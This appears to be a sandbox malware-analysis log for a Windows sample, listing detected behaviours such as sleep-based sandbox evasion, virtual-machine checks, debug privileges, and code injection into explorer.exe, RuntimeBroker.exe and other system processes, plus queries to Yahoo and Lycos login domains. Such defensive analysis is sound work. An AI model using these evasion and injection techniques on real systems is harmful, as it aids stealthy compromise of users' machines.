Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2628 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4795 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4455 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FDCBE3 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_01FDCBE3
Source: explorer.exe, 00000016.00000000.837460633.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000000.865764312.000000000A64D000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATALL
Source: RuntimeBroker.exe, 00000021.00000000.982425104.00000235BF29F000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000000.837460633.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 0000001C.00000000.935529304.000001B4F862A000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ll
Source: mshta.exe, 0000000C.00000003.775013130.00000116EEC22000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}sI$
Source: explorer.exe, 00000016.00000000.853506674.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000016.00000000.843356793.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: RuntimeBroker.exe, 00000019.00000000.887390945.0000027D4E762000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: explorer.exe, 00000016.00000000.837683193.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: PING.EXE, 00000020.00000002.984441946.000001F4F0F29000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FDE9AC lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_01FDE9AC
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE999E lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_01FE999E
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FEA2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_01FEA2FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FEE9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 40_2_00FEE9AC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FF999E FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 40_2_00FF999E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FFA2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 40_2_00FFA2FE

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_00401264 LoadLibraryA,GetProcAddress, 1_2_00401264
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Code function: 1_2_01FE0A0E StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_01FE0A0E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 40_2_00FF0A0E StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 40_2_00FF0A0E

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: lycos.com
Source: C:\Windows\explorer.exe Domain query: mail.yahoo.com
Source: C:\Windows\explorer.exe Domain query: login.yahoo.com
Source: C:\Windows\explorer.exe Domain query: www.lycos.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\System32\cmd.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe protection: execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.0.cs Jump to dropped file
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Memory allocated: C:\Windows\System32\control.exe base: D40000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 2B60000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 2970C560000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\cmd.exe base: 228E6D20000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4FA800000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 235C0BD0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 298653F0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 9F0000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580 Jump to behavior
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Writes to foreign memory regions
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Memory written: C:\Windows\System32\control.exe base: 7FF708FB12E0 Jump to behavior
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Memory written: C:\Windows\System32\control.exe base: D40000 Jump to behavior
Source: C:\Users\user\Desktop\anIV2qJeLD.exe Memory written: C:\Windows\System32\control.exe base: 7FF708FB12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9F6000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2B30000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 9FA000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 2B60000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF67FB65FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 2970C560000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF67FB65FD0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFFB000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\cmd.exe base: 7FF622087380
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7386889000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\cmd.exe base: 228E6D20000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\cmd.exe base: 7FF622087380
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4FA800000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD2181000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: D3C5BDD000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 235C0BD0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: F684018000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 298653F0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 9F0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
Source: C:\Windows\System32\cmd.exe Memory written: C:\Windows\System32\PING.EXE base: 7FF66ACA3320
Source: C:\Windows\System32\cmd.exe Memory written: C:\Windows\System32\PING.EXE base: 1F4F0EC0000
Source: C:\Windows\System32\cmd.exe Memory written: C:\Windows\System32\PING.EXE base: 7FF66ACA3320
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute read
